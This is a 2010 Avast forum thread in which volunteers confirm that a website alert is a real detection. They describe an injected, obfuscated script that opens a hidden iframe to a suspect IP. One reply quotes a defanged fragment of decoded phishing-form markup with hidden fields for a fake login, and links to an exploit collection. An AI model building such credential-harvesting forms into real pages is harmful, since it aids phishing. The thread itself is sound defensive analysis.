Author Topic: Nerdtests and Avast: Probably F/P?  (Read 5501 times)

Offline Ruuga

  • Newbie
  • *
  • Posts: 1
    • Personal Message (Offline)
Nerdtests and Avast: Probably F/P?
« on: July 07, 2010, 07:17:17 PM »
So today I tried to open this site but avast thinks there is a trojan. I'm using the Avast 5 but I didn't get the alarm when I was using version 4. Also Avast sends an alarm if you type the URL to the google. Also my friend said that he got an alert with Avast 5.
« Last Edit: July 09, 2010, 09:59:37 AM by igor »

Offline Pondus

  • avast! Überevangelist
  • Maybe Bot
  • *****
  • Posts: 21699
  • Gender: Male
    • Personal Message (Offline)
« Last Edit: July 07, 2010, 07:41:18 PM by Pondus »
Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline DavidR

  • avast! Überevangelist
  • Certainly Bot
  • *****
  • Posts: 69213
  • Gender: Male
  • No support PMs thanks
    • Personal Message (Offline)
Re: Nerdtests and Avast: Probably F/P?
« Reply #2 on: July 07, 2010, 08:00:50 PM »
There appears to be one of the google script tags which has been hacked (2nd to last on the page code, see image1), inserting a long line of obfuscated javascript.

This script when decoded (image2) is creating a hidden iframe tag that tries to open an IP in the Ukraine and highly suspect.

So I believe that the detection is good.
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2014 9.0.2018/ Outpost Firewall Pro9.1/ Firefox 28.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.0.1/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Offline polonus

  • avast! Überevangelist
  • Maybe Bot
  • *****
  • Posts: 20140
  • Gender: Male
  • malware fighter
    • Personal Message (Offline)
Re: Nerdtests and Avast: Probably F/P?
« Reply #3 on: July 07, 2010, 10:02:10 PM »
Hi DavidR,

And what does that long unescape string do? Well. that is hexadecimal coded javascript commands that are decoded according to lines as : <FORM METHOD="POST" ACTION="some address/form/mailto.cgi" ENCTYPE="x-wXw-form-urlencoded"> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="wXwmalcreant*com"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Some Login Hacked! (by OUR INC`s Fake Login)"> <INPUT TYPE="hidden" NAME="Next_Page" VALUE="hxtp/etc. etc. ">
Another interesting explanation of the exploit: http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_exploits_interesantes_actualizando-t141915.30.html

polonus
« Last Edit: July 07, 2010, 10:08:47 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline DavidR

  • avast! Überevangelist
  • Certainly Bot
  • *****
  • Posts: 69213
  • Gender: Male
  • No support PMs thanks
    • Personal Message (Offline)
Re: Nerdtests and Avast: Probably F/P?
« Reply #4 on: July 08, 2010, 12:19:59 AM »
What it does is shown in the last image and what I said in the post (which seems to differs from your example), creates a hidden iframe and connects to an IP in the Ukraine. After that I don't care what it does, just that avast has in my mind done its job and blocked the insertion of an obfuscated script (JS:ScriptXE-inf [Trj])

Even if your explanation is right it is still a good detection by avast, I just don't go to any depth when I find what I consider is enough evidence to confirm a good detection.
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2014 9.0.2018/ Outpost Firewall Pro9.1/ Firefox 28.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.0.1/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Offline Tech

  • avast! team
  • Certainly Bot
  • *
  • Posts: 64880
  • Gender: Male
    • Personal Message (Offline)
Re: Nerdtests and Avast: Probably F/P?
« Reply #5 on: July 13, 2010, 01:17:32 AM »
You've received a blog article.
Congratulations :)

http://blog.avast.com/2010/07/07/are-you-a-nerd/
The best things in life are free.

Offline DavidR

  • avast! Überevangelist
  • Certainly Bot
  • *****
  • Posts: 69213
  • Gender: Male
  • No support PMs thanks
    • Personal Message (Offline)
Re: Nerdtests and Avast: Probably F/P?
« Reply #6 on: July 13, 2010, 03:03:16 AM »
Thanks for the notice Tech.

Yes, it is nice that the virus labs noticed it amongst all the other topics ;D
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2014 9.0.2018/ Outpost Firewall Pro9.1/ Firefox 28.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.0.1/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

 

Google Chrome

AVAST recommends using the FREE Google Chrome™ browser.

Download Google Chrome Now